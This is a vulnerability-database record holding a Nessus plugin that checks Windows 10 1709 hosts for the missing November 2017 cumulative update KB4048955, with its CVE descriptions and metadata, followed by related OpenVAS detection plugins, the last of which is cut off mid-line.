{"id": "SMB_NT_MS17_NOV_4048955.NASL", "bulletinFamily": "scanner", "title": "KB4048955: Windows 10 Version 1709 and Windows Server Version 1709 November 2017 Cumulative Update", "description": "The remote Windows host is missing security update 4048955.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11803, CVE-2017-11844)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11862, CVE-2017-11866,\n CVE-2017-11870, CVE-2017-11871, CVE-2017-11873)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge as a result of how memory is accessed in\n code compiled by the Edge Just-In-Time (JIT) compiler\n that allows Control Flow Guard (CFG) to be bypassed. By\n itself, this CFG bypass vulnerability does not allow\n arbitrary code execution. However, an attacker could use\n the CFG bypass vulnerability in conjunction with another\n vulnerability, such as a remote code execution\n vulnerability, to run arbitrary code on a target system.\n (CVE-2017-11874)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)", "published": "2017-11-14T00:00:00", "modified": "2017-11-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/104551", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?948aaf0e"], "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11862", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11874", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "type": "nessus", "lastseen": "2020-08-19T05:12:46", "edition": 29, "viewCount": 18, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310812089", "OPENVAS:1361412562310812207", "OPENVAS:1361412562310812136", "OPENVAS:1361412562310812139", "OPENVAS:1361412562310812082", "OPENVAS:1361412562310812208", "OPENVAS:1361412562310812088", "OPENVAS:1361412562310812149", "OPENVAS:1361412562310812081"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_NOV_INTERNET_EXPLORER.NASL", "SMB_NT_MS17_NOV_4048952.NASL", "SMB_NT_MS17_NOV_4048958.NASL", "SMB_NT_MS17_NOV_4048953.NASL", "SMB_NT_MS17_NOV_4048956.NASL", "SMB_NT_MS17_NOV_WIN2008.NASL", "SMB_NT_MS17_NOV_4048959.NASL", "SMB_NT_MS17_NOV_4048957.NASL", "SMB_NT_MS17_NOV_4048954.NASL"]}, {"type": "kaspersky", "idList": ["KLA11855", "KLA11140", "KLA11136"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2"]}, {"type": "threatpost", "idList": ["THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73"]}, {"type": "thn", "idList": ["THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2"]}, {"type": "cve", "idList": ["CVE-2017-11871", "CVE-2017-11873", "CVE-2017-11844", "CVE-2017-11870", "CVE-2017-11866", "CVE-2017-11834", "CVE-2017-11874", "CVE-2017-11863", "CVE-2017-11861", "CVE-2017-11862"]}, {"type": "symantec", "idList": ["SMNTC-101732", "SMNTC-101763", "SMNTC-101709", "SMNTC-101704", "SMNTC-101724", "SMNTC-101725", "SMNTC-101723", "SMNTC-101719", "SMNTC-101707", "SMNTC-101750"]}, {"type": "seebug", "idList": ["SSV:97006", "SSV:96873", "SSV:96917"]}], "modified": "2020-08-19T05:12:46", "rev": 2}, "score": {"value": 9.2, "vector": "NONE", "modified": "2020-08-19T05:12:46", "rev": 2}, "vulnersScore": 9.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104551);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11791\",\n \"CVE-2017-11803\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11844\",\n \"CVE-2017-11846\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11861\",\n \"CVE-2017-11862\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11870\",\n \"CVE-2017-11871\",\n \"CVE-2017-11873\",\n \"CVE-2017-11874\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101704,\n 101705,\n 101706,\n 101707,\n 101709,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101723,\n 101724,\n 101725,\n 101727,\n 101728,\n 101730,\n 101731,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101750,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048955\");\n script_xref(name:\"MSFT\", value:\"MS17-4048955\");\n\n script_name(english:\"KB4048955: Windows 10 Version 1709 and Windows Server Version 1709 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048955.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11803, CVE-2017-11844)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11862, CVE-2017-11866,\n CVE-2017-11870, CVE-2017-11871, CVE-2017-11873)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge as a result of how memory is accessed in\n code compiled by the Edge Just-In-Time (JIT) compiler\n that allows Control Flow Guard (CFG) to be bypassed. By\n itself, this CFG bypass vulnerability does not allow\n arbitrary code execution. However, an attacker could use\n the CFG bypass vulnerability in conjunction with another\n vulnerability, such as a remote code execution\n vulnerability, to run arbitrary code on a target system.\n (CVE-2017-11874)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048955/windows-10-update-kb4048955\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?948aaf0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048955.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11827\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048955');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048955])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "104551", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "scheme": null, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}}

{"openvas": [{"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11871", "CVE-2017-11856", "CVE-2017-11862", "CVE-2017-11844", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11836", "CVE-2017-11870", "CVE-2017-11840", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11803", "CVE-2017-11869", "CVE-2017-11861", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11874", "CVE-2017-11846", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048955", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812088", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048955)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048955)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812088\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\", \"CVE-2017-11843\",\n \"CVE-2017-11873\", \"CVE-2017-11874\", \"CVE-2017-11791\", \"CVE-2017-11803\",\n \"CVE-2017-11827\", \"CVE-2017-11833\", \"CVE-2017-11834\", \"CVE-2017-11836\",\n \"CVE-2017-11837\", \"CVE-2017-11838\", \"CVE-2017-11844\", \"CVE-2017-11846\",\n \"CVE-2017-11848\", \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\",\n \"CVE-2017-11861\", \"CVE-2017-11862\", \"CVE-2017-11863\", \"CVE-2017-11866\",\n \"CVE-2017-11869\", \"CVE-2017-11870\", \"CVE-2017-11871\");\n script_bugtraq_id(101735, 101734, 101740, 101728, 101750, 101715, 101704, 101703,\n 101706, 101725, 101727, 101722, 101737, 101707, 101741, 101709,\n 101751, 101753, 101716, 101723, 101748, 101732, 101742, 101731,\n 101730);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 08:12:00 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048955)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048955\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the way that Microsoft Edge handles cross-origin requests.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Internet Explorer.\n\n - An error in the way the scripting engine handles objects in memory in Microsoft\n browsers.\n\n - An error in the way that the scripting engine handles objects in memory in\n Microsoft Edge.\n\n - An error in Microsoft Edge as a result of how memory is accessed in code\n compiled by the Edge Just-In-Time (JIT) compiler that allows Control Flow Guard\n (CFG) to be bypassed.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when Microsoft Edge improperly handles objects in memory.\n\n - An error when Internet Explorer improperly handles page content, which could\n allow an attacker to detect the navigation of the user leaving a maliciously\n crafted page.\n\n - An error when the scripting engine does not properly handle objects in memory\n in Microsoft browsers.\n\n - An error in Microsoft Edge when the Edge Content Security Policy (CSP) fails to\n properly validate certain specially crafted documents.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as the current user, determine the origin of all\n webpages in the affected browser, gain access to potentially sensitive\n information, bypass certain security features and trick a user into loading a\n page containing malicious content.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048955\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nPath = smb_get_system32root();\nif(!Path ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:Path, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.63\"))\n{\n report = report_fixed_ver( file_checked:Path + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.63\" );\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "description": "This host is missing a critical security\n update according to Microsoft KB4048952", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812136", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812136", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048952)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048952)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812136\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11863\", \"CVE-2017-11866\", \"CVE-2017-11869\", \"CVE-2017-11873\",\n \"CVE-2017-11768\", \"CVE-2017-11788\", \"CVE-2017-11880\", \"CVE-2017-11791\",\n \"CVE-2017-11827\", \"CVE-2017-11834\", \"CVE-2017-11836\", \"CVE-2017-11837\",\n \"CVE-2017-11838\", \"CVE-2017-11839\", \"CVE-2017-11840\", \"CVE-2017-11841\",\n \"CVE-2017-11842\", \"CVE-2017-11843\", \"CVE-2017-11846\", \"CVE-2017-11847\",\n \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11850\", \"CVE-2017-11851\",\n \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\", \"CVE-2017-11858\",\n \"CVE-2017-11830\", \"CVE-2017-11831\", \"CVE-2017-11833\");\n script_bugtraq_id(101748, 101732, 101742, 101728, 101705, 101711, 101755, 101715, 101703,\n 101725, 101727, 101722, 101737, 101735, 101734, 101719, 101740, 101741,\n 101729, 101709, 101762, 101738, 101763, 101764, 101751, 101753, 101716,\n 101714, 101721, 101706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 08:08:33 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048952)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048952\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update includes critical security updates\n\n - Addressed issue with the rendering of a graphics element in Internet Explorer.\n\n - Addressed issue where access to the Trusted Platform Module (TPM) for\n administrative operations wasn't restricted to administrative users.\n\n - Addressed issue where applications based on the Microsoft JET Database Engine\n fail when creating or opening Microsoft Excel .xls files.\n\n - Addressed a crash in Internet Explorer that was seen in machines that used large\n font-size settings.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as the current user, and obtain information to further\n compromise the user's system. Also attacker can run arbitrary code in kernel mode.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048952\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, 